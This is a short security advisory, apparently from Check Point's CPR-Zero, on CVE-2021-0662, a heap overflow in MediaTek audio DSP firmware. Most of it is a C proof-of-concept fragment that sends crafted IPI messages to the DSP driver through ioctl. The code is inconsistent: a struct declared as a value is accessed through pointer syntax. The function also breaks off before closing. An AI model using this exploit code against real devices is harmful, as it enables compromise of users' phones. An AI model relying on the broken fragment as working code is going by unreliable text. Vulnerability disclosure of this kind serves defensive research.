CPR-Zero: CVE-2021-0662

Information

Classic heap overflow in the init_share_mem_core function of the MediaTek audio DSP
firmware.

PoC:

#define AUDIO_IPI_SEND_PAYLOAD   0x40046901
#define AUDIO_IPI_LOAD_SCENE     0x4004690A

int send_ipi_payload(
    int32_t drv, uint8_t task_scene, uint16_t msg_id,
    uint32_t param1, uint32_t param2, void* data_buffer) {

    int ret = ioctl(drv, AUDIO_IPI_LOAD_SCENE, task_scene);
    if (ret != 0) {
        fprintf(stdout, "[-] ioctl AUDIO_IPI_LOAD_SCENE fail! ret = %d\n", ret);
        return -1;
    }

    ipi_msg_t ipi_msg;
    ipi_msg.magic        = 0x8888;
    ipi_msg.task_scene   = task_scene;
    ipi_msg.source       = 0;   // from HAL
    ipi_msg.target       = 2;   // to DSP
    ipi_msg.data_type    = 1;   // don't use DMA
    ipi_msg.ack_type     = 0;   // no ack
    ipi_msg.msg_id       = msg_id;
    ipi_msg.param1       = param1;
    ipi_msg.param2       = param2;


    if (ipi_msg->param1 > MAX_IPI_MSG_PAYLOAD_SIZE) {
        fprintf(stdout, "[-] payload size %u error\n", ipi_msg->param1);
        return -1;
    }
    memcpy(ipi_msg->payload, data_buffer, ipi_msg->param1);

References:
https://corp.mediatek.com/product-security-bulletin/October-2021
https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp

Share this: